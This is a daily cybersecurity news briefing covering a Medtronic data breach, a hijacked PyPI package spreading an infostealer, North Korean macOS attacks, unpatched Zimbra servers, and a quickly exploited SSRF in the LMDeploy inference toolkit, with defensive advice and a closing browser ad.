📰 The CyberSignal Daily — April 28, 2026

ShinyHunters claims 9 million records from medical device giant Medtronic, a Python package downloaded 1.1 million times a month was hijacked to push an infostealer directly into developer CI/CD pipelines, North Korean state actors are now weaponizing macOS's own scripting tools to steal crypto wallets, 10,500 Zimbra email servers remain exposed to an actively exploited zero-click XSS that CISA flagged weeks ago, and an AI inference engine was exploited within 12 hours of its vulnerability being disclosed.

Data Breaches

Medtronic — the global leader in cardiac devices, insulin pumps, and surgical robotics used in hospitals worldwide — has confirmed via SEC 8-K filing that an unauthorized party accessed its corporate IT systems. ShinyHunters claims to have exfiltrated terabytes of data including over 9 million PII records. Medtronic's network segmentation appears to have held — product control and manufacturing networks show no evidence of compromise — but the corporate side is confirmed breached.

ShinyHunters' pattern here is textbook: public leak site listing, brief removal suggesting active negotiations or private sale, SEC disclosure forced by the extortion threat. This is the group's fourth confirmed major target in April alone — ADT, Udemy, and now Medtronic all in the same week. The question isn't whether the corporate-to-clinical air gap held this time. It's how long corporate healthcare data remains separate from patient outcomes when attackers have nine million PII records to use for targeted spear-phishing against hospital procurement teams, R&D staff, and clinical partners.

→ Read the full story

Supply Chain Attack

On April 21, attackers compromised a PyPI package maintainer's account and pushed a malicious update to a utility library that pulls over 1.1 million downloads per month. Any developer or build server that ran pip install --upgrade between April 21-23 automatically pulled the W4SP Stealer — a Windows infostealer that harvests browser passwords, SSH keys, AWS credentials, .gitconfig files, and Discord/Telegram tokens. Because the payload ran via setup.py install hooks, it executed immediately with the permissions of whoever ran the install command.

The 48-hour exposure window is the critical detail. In enterprise environments with automated CI/CD pipelines, pip upgrade runs without human intervention. Thousands of build servers may have silently compromised themselves before PyPI pulled the package. Any machine that pulled the update must be treated as fully compromised and re-imaged — W4SP is persistent and cannot be removed by simply reverting the package. SSH keys and cloud credentials that existed on those hosts during the window must be rotated immediately.

→ Read the full story

Nation-State Threats

Microsoft and Mandiant have confirmed that Sapphire Sleet (APT38) and UNC1069 — North Korean threat actors previously focused on Windows — have developed dedicated macOS attack chains targeting crypto, fintech, and healthcare professionals. The approach: fake recruitment calls and video meeting "technical issues" that prompt victims to run malicious AppleScript files or paste Terminal commands. No exploit required. The user authorizes the infection themselves.

The AppleScript variant modifies macOS's TCC database to silently grant itself Total Disk Access — bypassing Gatekeeper and notarization entirely because the user ran the script manually. The Terminal variant downloads a Mach-O binary via curl | zsh that targets browser sessions, crypto wallet seeds, and Apple Keychain. North Korea is simultaneously poisoning the broader npm ecosystem — the axios package was recently seeded with the WAVESHAKER backdoor to hit developers who never clicked anything. Two tracks, same objective: drain crypto infrastructure to fund the weapons program.

→ Read the full story

Vulnerabilities

CVE-2025-48700 — a stored XSS flaw in Zimbra Collaboration Suite — was patched in June 2025. Ten months later, Shadowserver data shows 10,500+ servers still running vulnerable versions (8.8.15, 9.0, 10.0, 10.1), with the highest concentrations in Asia (3,794) and Europe (3,793). CISA added the flaw to the KEV catalog on April 21 and gave federal agencies a three-day patch window. The attack vector: send a crafted email. When the victim opens it, the payload executes automatically in their active session. Zero clicks required.

Session hijacking, email exfiltration, account takeover, and — if the victim is an admin — lateral movement across the entire Zimbra instance. The UAC-0233 threat group has been observed actively exploiting this against Ukrainian targets. The patch has existed for ten months. The 10,500 exposed servers represent a systematic failure of patch hygiene on legacy email infrastructure — mail servers treated as appliances rather than attack surfaces. CISA's three-day federal mandate is a signal the private sector should treat as their own deadline.

→ Read the full story

Artificial Intelligence

CVE-2026-33626 — a CVSS 7.5 Server-Side Request Forgery flaw in LMDeploy, the open-source AI inference toolkit — was disclosed via GitHub Security Advisory on April 22. Sysdig observed the first exploitation attempt 12 hours and 31 minutes later, originating from an IP in Kowloon Bay, Hong Kong. No public proof-of-concept existed. The attacker reverse-engineered the advisory text into a working exploit and within 8 minutes had confirmed SSRF reachability, stolen AWS IMDS credentials, and swept internal ports for Redis, MySQL, and admin dashboards.

The attack works because LMDeploy's vision-language module fetches external image URLs for model processing — an AI feature that becomes an SSRF primitive when pointed at internal addresses. AI inference engines are deployed with rich network access by design. They trust internal infrastructure. They're internet-facing by function. And their security is treated as an afterthought. Patch to v0.12.3 immediately. If you're on AWS, enforce IMDSv2 with hop limit 1. Twelve hours is no longer a grace period.

→ Read the full story

This morning’s top stories describe the full attack surface of 2026 in a single morning briefing.

The supply chain attack hit developers through a trusted package they never thought to question. The nation-state attack bypassed macOS security by asking users to run things themselves. The Zimbra attack triggers automatically when an email is opened. The AI exploit required reading a GitHub advisory and writing code — no PoC needed. The Medtronic breach forced disclosure through public extortion rather than internal discovery.

In each case the attack used something trusted — a popular package, a macOS script, an inbox, an AI endpoint, a threat actor's leak site — to achieve something catastrophic. The window between disclosure and exploitation is now measured in hours. The assumption that a "legacy mail server" doesn't need immediate patching is wrong. The assumption that macOS is inherently safe is wrong. The assumption that your AI infrastructure is not a network attack surface is wrong.

Everything is the attack surface. Everything.

Stay sharp. Stay ahead.

Till next time,

Our News Site | Get the Weekly Briefing

Your browser gets you to a page. Norton Neo gets you to the answer. The first safe AI-native browser built by Norton moves with you from idea to action without slowing you down. Magic Box understands your intent before you finish typing. AI that works inside your flow, not beside it. No prompting. No copy-pasting. No switching apps.

Built-in AI, instantly and for free. Privacy handled by Norton. Built-in VPN and ad blocking protect you by default. No configuration. No extra apps. Nothing to think about.

Fast. Safe. Intelligent. That's Neo.

Download Norton Neo